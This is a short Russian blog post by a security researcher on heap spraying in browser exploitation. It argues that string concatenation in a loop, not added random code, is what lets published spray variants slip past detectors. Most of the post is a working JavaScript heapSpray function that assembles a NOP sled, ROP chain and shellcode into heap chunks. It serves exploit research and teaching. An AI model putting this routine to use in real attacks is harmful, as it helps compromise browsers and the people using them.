28 Ноября, 2012

HeapSpray

Alexey Sintsov
Мини блого-запись о хипспрее.

Забавно, но в Интернетах говорят о всяких Bubble и Nozzle, и в частности относительно FF и IE9. Я вот прочитав следующие блоги:

https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
http://www.greyhathacker.net/?p=549

... был убежден в эффективности данных методов и даже рассказывал об этом на воркшопе, но сегодня захотелось мне определить порог детектирования HeapSpray. И тут то я понял, что истинная причина того, почему все эти методы из блогов работают, не в том, что они добавляют рандомный код в начали строки и обманывают сложные алгоритмы, а в том, что там есть конкатенация в цикле. Другими словами не надо усложнять код и добавлять счетчик или не-ассемблерные инструкции и тд. Достаточно сделать конкатенацию! Все просто, не усложняйте себе жизнь ;)

P.S. Прошу считать это за дополнение к воркшопу, где рассказывалось об методе Корелана. Теперь рабочий код для HeapSpray много проще (greyhathacker.net базовый вариант):



  1. var heap_chunks;


  2. function heapSpray(rop,shellcode,nopsled)


  3. {


  4. var chunk_size, headersize, nopsled_len, code;


  5. var i, codewithnum;


  6. log.innerHTML+="<br><b>Stage 2. HeapSpraay...";


  7. chunk_size = 0x40000;


  8. headersize = 0x10;


  9. nopsled_len = chunk_size - (headersize + rop.length + shellcode.length);


  10. while (nopsled.length < nopsled_len)


  11. nopsled += nopsled;


  12. nopsled = nopsled.substring(0, nopsled_len);


  13. code = nopsled + rop + shellcode;


  14. heap_chunks = new Array();


  15. for (i = 0 ; i < 1000 ; i++)


  16. {


  17. codewithnum = "HERE" + code;


  18. heap_chunks[i] = codewithnum.substring(0, codewithnum.length);


  19. }


  20. }
или введите имя

CAPTCHA